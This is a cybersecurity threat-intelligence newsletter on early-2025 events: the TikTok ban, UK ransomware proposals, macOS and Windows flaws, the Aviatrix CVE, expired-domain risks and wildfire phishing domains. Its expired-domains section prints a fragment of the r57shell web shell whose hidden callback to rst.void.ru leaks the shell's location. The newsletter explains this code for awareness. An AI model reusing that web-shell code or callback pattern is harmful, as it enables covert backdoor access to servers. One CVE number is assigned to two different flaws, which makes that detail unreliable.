Precedence: Routine

BLUF: Phishing Campaigns Target California Fires, US Bans TikTok Briefly Before Being Delayed by President Trump, UK Government Considers 3 Different Proposals to Combat Ransomware Payments, Critical MacOS Attacks and Security Bypasses, US Treasury Imposes Sanctions as Recent Attack was Attributed to Silk Typhoon, Critical Aviatrix Controller CVE Being Exploited to Deploy Malware & Cryptominers, Expired Domains Present New Security Threats, January Patch Tuesday Updates Fix Major Security Issues

---

BEGIN TEARLINE

[Law] United States TikTok Ban Delayed via Executive Order

The US government’s ban of the popular short-form social media platform TikTok was rolled out on Sunday, January 19^th. It lasted for less than 24 hours as the new incoming US president signed an executive order to delay the ban by 75 days. US users began losing access to TikTok content on Saturday night. TikTok became available again via the website and certain mobile platforms the next day. The president said the executive order would also absolve liability from any party who contributed to the app’s continued availability in the United States. TikTok made a public statement that they are in the process of restoring service to the US and they showed appreciation for the president’s action.

As of January 21^st, Apple & Google have not restored the application to their respective app stores. The reasoning is that companies have historically faced liability by choosing to comply with an executive order over a law. They will likely wait for this incident to develop further before making a final decision. This means iOS & Android users are still unable to download TikTok or download updates for the application. Other companies such as Oracle (who handles data for TikTok) have brought TikTok back online.

Analyst Comments: (ResidentGood) There are rumors floating around of various celebrities buying TikTok such as Mr. Beast, Mark Zuckerberg, and Elon Musk. At the time of this report, TikTok’s ownership has not changed. TikTok has had issues in the past with US regulators. In 2019, the precursor to TikTok, muscial.ly, was sued by the Federal Trade Commission for violating online child protection laws (COPPA).

In the outrage resulting from the ban, US TikTok users have began to flood the platform Xiaohongshu (RedNote). RedNote is a chinese social media platform similar to TikTok, with arguably worse risks to US national security. While TikTok is actually headquartered in Singapore, RedNote is located in Shanghai. RedNote users face less restrictions in China compared to Chinese TikTok users. Unlike TikTok, all of RedNote’s user data is stored on servers in China, leaving them subject to Chinese laws on technology. RedNote provides a lower barrier of entry for espionage operations conducted on US citizens.

The United States is not the only country to have concerns with the TikTok platform. In 2023, Canada banned TikTok from government devices. In November of 2024, the Canadian government shut down the offices of TikTok Technology Canada. In March of 2024, Kenya’s Data Protection Commissioner raised concerns about TikTok’s use to spread misinformation, commit fraud against Kenyan citizens, and show inappropriate content to minors. US citizens should proceed with caution when using platforms like TikTok & RedNote. It is crucial to be aware of the risks you are taking with your data.

[Law] UK Consultation Regarding Ransomware Payments

The United Kingdom began a consultation to consider 3 proposals involving ransomware payments:

• Proposal 1: A total ban on paying ransoms for critical infrastructure & public sector organizations, as well as mandated reporting to authorities. This would expand upon the existing ban on government departments paying ransoms.
• Proposal 2: More strict than the first, this centers around setting up a ransomware prevention authority. This proposal assumes a total ransomware payment ban is in place (like in proposal 1). Any organizations not covered by the first proposal would need to ask for permission to pay ransoms from attacks. This essentially creates a license to pay ransoms where the UK government would be able to deny or approve payment in ransomware incidents on a case-by-case basis. This authority would also give advice and guidance to victims of ransomware incidents.
• Proposal 3: The most lenient option where no payment ban is implemented, but a new law would mandate reporting of all ransomware incidents.

These proposals are novel compared to other nations due to how broadly they would apply. The consultation will end on April 8^th.

Analyst Comments: (ResidentGood) This is a controversial topic in information security, there are varying opinions on how to disincentivize ransomware attacks. Leadership from the UK’s National Cyber Security Centre stated that the consultation was a critical step in UK protections against ransomware attacks. Allan Liska from Recorded Future said in May last year that current efforts have not been working while acknowledging the arguments against the ban. The main counterargument is that a ban will not effectively stop attacks, and will only harm the organizations that fall victim. Kemba Walden, former National Cyber Director for the White House, said in 2023 that the current state of the economy would result in the victim organizations paying the biggest price. Deputy Director Paul Foster of the National Crime Agency’s cybercrime unit stated that ransomware is the largest threat to organizations in terms of losses. He said they look forward to supporting this process and the positive effect it will have on the UK’s security posture. Proper implementation of these laws can mitigate some of the worries surrounding ransom payment regulation. The world will be watching to see how it works out.

[Major Vulnerabilities] Latest Critical MacOS Attacks, Malware, and Security Bypasses

MacOS used to have the misapplied reputation for being "unhackable", or at least much more secure in comparison to Windows or traditional open source Linux distributions. This reputation came from the combination of MacOS both having a smaller target on its back (as opposed to Windows) and having Apple's unique advantage of being able to control security in its devices across both the hardware and software stack. However, recent cyberattacks, security control bypasses, and malware have clarified that MacOS devices, like all internet-connected systems, are indeed hackable.

As projected when its source code was leaked to the public a few months ago, the Banshee Stealer malware has been copied and modified to launch attacks against the global MacOS user base (consisting of 100 million devices). The new version uses advanced string encryption to bypass Apple's XProtect antivirus (by obfuscating strings that were plaintext in the original version of the infostealer), as well as removing a language check that prevented the original malware from targeting Russian users.

In addition to active malware campaigns, numerous MacOS vulnerabilities have appeared in the public purview. This includes two integral components of MacOS endpoint security that have been bypassed and/or exploited in the wild. First to be bypassed is the SIP (System Integrity Protection) feature, which ensures critical, protected operating system files are only able to be modified by Apple-signed processes with special entitlements to write to those files (such as Apple software updates and installers). CVE-2024-54498 bypasses SIP through exploitation of the storagekitd process, and was patched in MacOS Sequoia 15.2. While not necessarily an example of the specific vulnerability above being exploited, the below screenshot from the Huntress EDR shows that SIP is currently being targeted by attackers in the wild:

Another concerning attack involves a high-severity sandbox escape vulnerability, CVE-2024-54498 (CVSS 8.8), which exploits the sharefilelistd process and a path handling issue. This allows malicious applications to escape the MacOS sandbox to access user data, manipulate system files, or drop additional malware on the system. See this video for a demonstration of the sandbox escape, and the publicly-available exploit in the Github repository of the researcher who revealed it. This was patched in Sequoia 15.2, Ventura 13.7.2, and Sonoma 14.7.2.

Analyst Comments: (SirPicklJohn) The above items just go to show that no device is invulnerable! A layered defense with overlapping controls (a particularly effective set of controls being robust asset and patch management) is crucial to stopping modern threats.

[National Security] Update on the US Treasury Hack

Last report we covered a supply-chain attack on the US Treasury that was under investigation. Recently, the attack has been attributed to the China-sponsored APT: Silk Typhoon. The US Treasury Secretary Janet Yellen, along with 2 of her lieutenants, had their systems compromised resulting in the exfiltration of unclassified documents. The US Treasury’s Office of Foreign Assets Control recently imposed sanctions on Yin Kecheng for his involvement with this attack on the Treasury. Kecheng is affiliated with the Chinese Ministry of State Security (the primary civilian intelligence agency in China). A spokesperson for China’s Foreign Ministry said that “China has always opposed all forms of hacker attacks” in regards to the incident.

Analyst Comments: (ResidentGood) Ensuring your organization has controls in place to account for supply-chain threats is the best solution in this case. Security is a team effort, and all other parties that integrate with your organization must also integrate with your security standards. If your vendor is compromised, it can lead to you being compromised. Employing dynamic attack detection based on behavior can help you identify when trusted entities may be compromised. Employing threat intelligence solutions can help you keep your finger on the pulse of emerging supply-chain threats. Zero-Trust Architecture can help you verify the activity of your infrastructure and apply strict access control. Segmentation of IT assets can help isolate compromised resources and reduce the impact of an attack. If you have a third-party cybersecurity vendor, ensure they have plans in place for supply-chain attacks specifically. Ensure that they are keeping up to date with auditing and security improvements.

This incident is one of many that demonstrates the growing threat of state-sponsored cyber espionage. Our other analyst, SirPicklJohn, published a thorough article on the recent major telecommunications attack involving similar threat actors, and the general backstory of rising Chinese APT activity.

[Major Vulnerabilities] Major Security Issues with Windows - Patch Now!

It is critical that enterprise environments install the January 2025 Patch Tuesday security updates as soon as possible! This update fixes 159 vulnerabilities, including 10 critical vulnerabilities. 3 of those vulnerabilities (CVE-2025-21335, CVE-2025-21334, and CVE-2025-21333, all with a base CVSS score of 7.8) involve local escalation of privilege and are being actively-exploited in the wild. Other vulnerabilities range from "Exploitation Less Likely" to "Exploitation More Likely", but don't have proof-of-concept exploits or known exploitation.

Other interesting vulnerabilities fixed by the update include the following:

• Bypasses of the crucial VBS (Virtualization-Based Security) and HVIC (Hypervisor-Protected Code Integrity) Windows security components: These create isolated memory environments that the OS trusts and prevents unauthorized drivers and system files from being loaded into memory, respectively. These affect Windows 11 21H2+, Windows Server 2016-2022, and x64, x86, and ARM64-based systems.
• A massive Outlook RCE vulnerability (CVSS 9.8/10) exploited by a user simply opening a specially crafted email, or by Outlook previewing the email: The vulnerability is specifically located in the Object Linking and Embedding (OLE) technology used in Windows and Outlook for embedding and linking documents and programs.
• Credentials of the logged-in user that are sent with the NTLMv1 protocol, can be sent to an attacker's remote host deploying a specially crafted Theme file in Windows Explorer: Within the file are the BrandImage and Wallpaper options that can specify the malicious remote host/network file path, with the file merely needing to be loaded (as opposed to being clicked or opened by the user) to execute the exploit.
• Two Microsoft Excel vulnerabilities, involving remote code execution (CVE-2025-21362, CVSS 8.4) and “security feature bypassing” (CVE-2025-21364, CVSS 7.8): Details on the vulnerabilities have not been disclosed by Microsoft.
• Bypassing the Active Directory GPO that disables NTLMv1 (a weak legacy authentication protocol with several known security weaknesses targeted by attackers): With 64% of Windows AD user accounts regularly authenticating with NTLM(v1), this has potentially wide-reaching implications (SilverFort, 2024).
  Many of the worst vulnerabilities fixed in the January 2025 Patch Tuesday security updates consisted of "CWE-416: Use After Free" vulnerabilities, which involve a software reusing or referencing memory after it has been freed. After the memory space is re-allocated, the original pointer still references a location somewhere in that new allocation:

KNOWN PROBLEM IN UPDATING: If your Windows Server (between years 2019 to 2025), Windows 11 22H2 to 24H2, or Windows 10 22H2 computers have version 2411 (released late November 2024) of the Citrix Session Recording Agent (SRA) installed, the January 2025 Patch Tuesday security update will fail and revert any changes after you reboot your computer. This comes from certain driver files not being able to be updated with the Citrix SRA installed. The workaround for this includes stopping and disabling the service startup for the CitrixSmAudMonitor service, installing the security update and rebooting the system, then re-starting and re-enabling the CitrixSmAudMonitor service. This can be done via Task Manager, or the following commands:

• Stopping and disabling service (PowerShell):
  • Stop-Service -Name "CitrixSmAudMonitor" -Force
  • Set-Service -Name "CitrixSmAudMonitor" -StartupType Disabled
• Restarting and re-enabling (PowerShell):
  • Set-Service -Name "CitrixSmAudMonitor" -StartupType Automatic
  • Start-Service -Name "CitrixSmAudMonitor"
• Stopping and disabling service (Command Prompt):
  • sc stop CitrixSmAudMonitor
  • sc config CitrixSmAudMonitor start= disabled
• Restarting and re-enabling (Command Prompt):
  • sc config CitrixSmAudMonitor start= auto
  • sc start CitrixSmAudMonitor

Analyst Comments: (SirPicklJohn) While testing and applying the January 2025 Patch Tuesday security updates should be priority number one, some additional security measures that mitigate the risk of several of the patched vulnerabilities are as follows:

• Robust network monitoring of affected services to identify unusual activity targeting their ports
• Firewall rules that limit exposure of public-facing services to only trusted networks
• VPNs for remotely accessing company networks
• Disabling NTLM (Restrict NTLM: Outgoing NTLM traffic to remote servers), enforcing the Kerberos and NTLMv2 authentication protocols (in that order when there is a choice) wherever possible, and setting LmCompatabilityLevel to level 5 at the domain-level
• Reviewing CISA’s KEV catalog at regular intervals, and assessing systems for exposure to them. The catalog is accessible in CSV, JSON, JSON Scheme, and print-friendly formats
• Discontinuing use of vulnerable products if no updates or workarounds are available
  Patch management is important, but having a robust defense-in-depth strategy in place to provide layered controls that can compensate for vulnerabilities and failures is even more important!

[Major Vulnerabilities] Severe Aviatrix Controller Vulnerability Exploited to Deploy Malware & Cryptominers

CVE-2024-50603 is a critical Aviatrix Controller vulnerability with a CVSS of 9.8 that is being exploited in the wild. Aviatrix Controller is a tool for automating cloud infrastructure deployment & management. It is used by many organizations to manage AWS and Azure instances. The Aviatrix Controller vulnerability allows Remote Code Execution by exploiting vulnerable parameters supplied by the user for the cloudx_cli application. The vulnerable parameters discovered were cloud_type and src_cloud_type. These particular parameters do not have their input sanitized like other parameters. An attacker is able to pipe malicious code via the vulnerable parameters and remotely execute code.

A Proof-of-Concept (PoC) published by a security researcher showed how to exploit the vulnerability to send the contents of /etc/passwd to an attacker’s server of choice. This was published within 24 hours of the CVE being disclosed to the public. While Aviatrix was working on patching the vulnerability, attackers exploited it to deliver malware to cloud servers and deploy hidden cryptocurrency mining software.

Analyst Comments: (ResidentGood) Security researchers are generally not advised to publicly release PoCs so soon after a vulnerability is found. This does not give vendors proper time to release updates to prevent further victimization. The result is attackers being handed a blueprint on exploiting known vulnerabilities that are not widely patched. Many researchers wait 30 - 90 days to hear back from the vendor whose software is vulnerable before disclosing PoCs to the public.

The severity of this vulnerability means it is imperative for any companies who use Aviatrix Controller to patch as soon as possible. Aviatrix versions 7.1.4191 and 7.2-7.2.4 are vulnerable to this CVE. It is recommended to update to version 7.2.4996 which does not contain this vulnerbality. Aviatrix noted that there are some cases where the patch must be reapplied, such as when a version is patched and later upgraded to a later vulnerable version. Patches must also be applied again if the controller does not have a CoPilot running version 4.16.1 or newer.

[Attacker TTPs] From Opportunity to Threat: New Security Implications of Expired Domains

Have you ever thought about the security considerations surrounding expired internet domains? Before getting into the specific news surrounding their latest attacks and vulnerabilities, some basic malicious TTPs and security concerns of expired domains are as follows:

• Someone can purchase a failed startup's domain and use it to re-create email accounts of former employees. While they can't access old email data, they may be able to perform SaaS/cloud-based account resets and/or log into the different SaaS products/cloud accounts that an organization used (which can contain all sorts of data, especially for sensitive HR systems with tax documents, pay stubs, insurance information, SSNs, etc.).
• Catch-all email forwarding can harvest emails being sent to the expired domain, which might be used to access sensitive information, mislead or social engineer users, etc.
• Impersonating legitimate domains and links that don't belong to the previous owner anymore to perform social engineering on end-users, which could lead to reputational damage of the original domain owner. Check out the other story I covered in this report on the swarm of phishing attacks occurring in the wake of the California fires! In my research I found a legitimate small business domain that had expired and is now being used by attackers (beckyjonestravel[.]com).

Google and Expired Domains: A security consideration of expired domains specifically found in Google's "Sign in with Google" feature has come to light recently, exposing thousands of domains. When using the feature, Google sends a set of "claims" about the user (in JSON-formatted data, including the user's email address and domain with the email and hd claims, respectively) to the service being signed into. As there is not a reliable alternative claim that Google provides, these two claims are frequently used by services to authenticate users, and the problem arises due to the fact these claims do not consider the owner of the domain (thus, not recognizing when a change in domain ownership has occurred). The researcher who discovered this vulnerability was able to use one of the expired domains he purchased to log into the previous domain owner's Slack, Notion, Zoom, HR systems (accessing SSNs and PII), interview platforms (accessing PII and miscellaneous sensitive data), and chat platforms (accessing sensitive discussions).

"Backdooring Your Backdoors": Offensive security researchers (watchTowr Labs) recently ran a robust study involving the purchase of expired domains, setting up a log server that recorded traffic to those domains, and logging connection attempts from active webshells (backdoor pieces of code in web servers that provide persistence and/or accomplish post-exploitation activities) in the wild that pointed to the hardcoded (expired) domains. Logged activity showed that watchTowr researchers would have been able to access well over 4,000 live backdoors (including 4 from breached .gov systems, and others from higher education, cloud services, and more that have yet to be identified) if they weren't staying within legal boundaries and only logging activity, with the number of breached systems growing at the time of the article's writing. The complexity of the webshells and their obfuscation techniques ranged from being simple and unsophisticated up to being at a level of complexity usually only seen from APT groups. Additionally, watchTowr found instances of "backdoored backdoors", where webshells published for use by other hackers came with their own backdoor (pointing to the domain of the original hacker who published it)! An example of this is shown in the original r57shell below:

if (!in_array($addr[0], $serv)) {
@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";

The code above fetches a file from the rst.void.ru domain (owned by the creators of the r57shell), and appears to send the current version string of the shell to the script maintainers, but it actually leaks the location of the web shell to the owners of rst.void.ru (giving them access). What do you think would happen if the rst.void.ru expired, and someone purchased it? They would gain access to the webshells, as demonstrated by watchTowr.

Analyst Comments: (SirPicklJohn) Truffle Security highlights the statistics that 90% of tech startups fail, 50% of those startups rely on Google Workspace for their email, and there are over 100,000 expired domains available for purchase on Crunchbase's startup database. The threat actors actively targeting these expired domains include APT groups, security researchers, and cybercriminals. To protect against the security concerns detailed above, domain owners should configure domain auto-renewal when available to ensure it doesn't accidentally expire, users should delete their accounts with third-party SaaS/cloud services as a part of their company tearing down operations, and non-email 2FA should be configured on all SaaS/cloud services.

[Attacker TTPs] Phishing After Disasters - A Case Study from the California Fires

If you've been following headlines in the U.S. recently, you will see that California has been been grappling with devastating wildfires since January 7th (the time of writing is January 20th). Like other disasters, whether natural or human-caused, cybercriminals have a history of abusing the following chaos and uncertainty to try and scam, phish, and social engineer people for nefarious gain.

Veriti Research discovered 9 new domains linked to phishing campaigns targeting the California fires:

• The following domains were hosted on the same two servers, that have historically hosted around 29.6 million domains each (likely all used for phishing upon further analysis of a sample) (source: IPinfo [see the screenshots below]):
  • malibu-fire[.]com <- the only one still active in this list, as of January 20th, 2025.
  • Calfirerestoration[.]store <- youngest one, expired January 11th, 2025.
  • Lacountyfirerebuildpermits[.]com
  • Pacificpalisadesrecovery[.]com
  • palisades-fire[.]com
  • palisadesfirecoverage[.]com
  • A series of DNS OSINT techniques revealed that these two servers are running off the host a2aa9ff50de748dbe.awsglobalaccelerator[.]com. Further OSINT on a sample of the domains hosted on it determined that they were all registered with a private domain service.
• fire-relief[.]com <- 198.49.23.145
• boca-on-fire[.]com <- 198.185.159.144
• fire-evacuation-service[.]com

Note. Above is a screenshot of the IP addresses hosting some of the known phishing sites (like malibu-fire[.]com) targeting Californians and those wanting to donate to support them. Below is the "pay" subdomain used to obtain victims' payment information.

Analyst Comments: (SirPicklJohn) These kinds of scams are common after disasters and extreme weather events, and vary in their end-goal (from scamming people out of donations, to physically going from house-to-house in a FEMA outfit asking for your SSN or bank information). Social engineering attacks are incredibly prevalent across all sectors, and all internet users nowadays should protect themselves with good phishing awareness and healthy skepticism. Stay safe!

END REPORT

---

If you are interested in anything Cybersecurity, come check out our Discord

Sources:

UK Consultation Regarding Ransomware Payments:

1. Ex-White House cyber official says ransomware payment ban is a ways off (April 16, 2024)
2. Ban Ransomware Payments, Say Desperate Cybercrime Fighters (May 29, 2024)
3. World-leading proposals to protect businesses from cybercrime (January 14 2025)
4. UK floats ransomware payout ban for public sector (January 14, 2025)
5. Proposals aim to protect UK infrastructure from ransomware (January 14, 2025)
6. UK proposes ban on ransomware payments in critical sectors (January 15, 2025)

United States TikTok Ban Delayed via Executive Order:

1. Kenya to TikTok: Prove Compliance With Our Privacy Laws (March 22, 2024)
2. FTC Slams TikTok With Lawsuit After Continued COPPA Violations (August 5, 2024)
3. Canada Closes TikTok Offices, Citing National Security (November 7, 2024)
4. Has the TikTok Ban Already Backfired on US Cybersecurity? (January 17, 2025)
5. TikTok restores US service after Trump says “we have to save it” (January 20, 2025)
6. TikTok Still Off App Stores As Trump Freezes Ban—Here’s What To Know (January 21, 2025)

Update on US Treasury Hack:

1. Chinese hackers accessed Yellen's computer in US Treasury breach, Bloomberg News reports (January 16, 2025)
2. U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Salt Typhoon (January 18, 2025)
3. US Sanctions Chinese Hackers for Treasury, Telecom Breaches (January 20, 2025)

Latest Critical MacOS Attacks, Malware, and Security Bypasses:

1. New Banshee Stealer Variant Bypasses Antivirus with Apple's XProtect-Inspired Encryption (January 9th, 2025)
2. Huntress LinkedIn Post - "It's a myth that Macs can't be hacked." (January 10th, 2025)
3. Video Demonstration of CVE-2024-54498 (January 9th, 2025)
4. Github Repository of CVE-2024-54498 PoC (The week of January 5th, 2025)
5. TheEncryptionEdge7 - "macOS Sandbox Hacked?! How CVE-2024-54498 Breaks Apple's Security Barrier" (January 15th, 2025)
6. Critical macOS Sandbox Vulnerability (CVE-2024-54498) PoC Exploit Released Online (January 13th, 2025)

Major Security Issues with Windows - Patch Now!:

1. Microsoft Excel Remote Code Execution Vulnerability (January 14th, 2025)
2. Critical Microsoft Outlook Vulnerability Rated 9.8/10 Confirmed - Update Now (January 16th, 2025)
3. Researchers Warn of NTLMv1 Bypass in Active Directory Policy (January 17th, 2025)
4. If you think you blocked NTLMv1 in your org, think again (January 16th, 2025)
5. Active Directory Hardening Series - Part 1 – Disabling NTLMv1 (September 21, 2023)
6. New Critical Microsoft Windows Warning As 3 Zero-Day Attacks Underway (January 15th, 2025)
7. January Windows updates may fail if Citrix SRA is installed (January 14th, 2025)
8. Microsoft Patch Tuesday Update Fails If Citrix Recording Software Installed (January 16th, 2025)
9. Microsoft’s January security update fails/reverts on a machine with 2411 Session Recording Agent (January 15th, 2025)
10. Windows 11 Security Features Bypassed to Obtain Arbitrary Code Execution in Kernel Mode (January 15th, 2025)
11. CWE-416: Use After Free (n.d.)
12. CWE-502: Deserialization of Untrusted Data (n.d.)
13. CWE-591: Sensitive Data Storage in Improperly Locked Memory (n.d.)

Severe Aviatrix Controller Vulnerability Exploited to Deploy Malware & Cryptominers:

1. NIST CVE-2024-50603 (January 7, 2025)
2. CVE-2024-50603: Aviatrix Network Controller Command Injection Vulnerability (January 7, 2025)
3. Cryptojacking, backdoors abound as fiends abuse Aviatrix Controller bug (January 13, 2025)

From Opportunity to Threat: New Security Implications of Expired Domains:

1. Backdooring Your Backdoors - Another $20 Domain, More Governments (January 25th, 2025)
2. Are Expired Domains a Security Concern? How to Avoid Domain Expiration (January 16th, 2022)
3. Google OAuth Vulnerability Exposes Millions via Failed Startup Domains (Jan 14th, 2025)
4. Truffle Security - Millions of Accounts Vulnerable due to Google’s OAuth Flaw (January 13th, 2025)
5. Researchers hijack thousands of backdoors thanks to expired domains (January 9th, 2025)
6. Expired domains a hacking threat – risks of letting your domain lapse. (n.d.)

Phishing Campaigns After Disasters (Case Study in the California Fires):

• Cyber Threats Amid Disaster: California Fires Spark New Phishing Scams (January 15th, 2025)
• CISA - Avoid Scams After Disaster Strikes (October 8th, 2024)
• FTC - How To Avoid Scams After Weather Emergencies and Natural Disasters (March 24th, 2024)
• FEMA - Disaster Fraud (n.d.)
• Phishing Scam Claiming to Offer Money for Victims (n.d.)
• DNS and IP Analysis Tools:
  • viewdns.info (Reverse IP Lookup, IP History, whois Lookup)
  • whoxy.com
  • ipinfo.io
  • browserleaks.com
  • nslookup (CLI tool)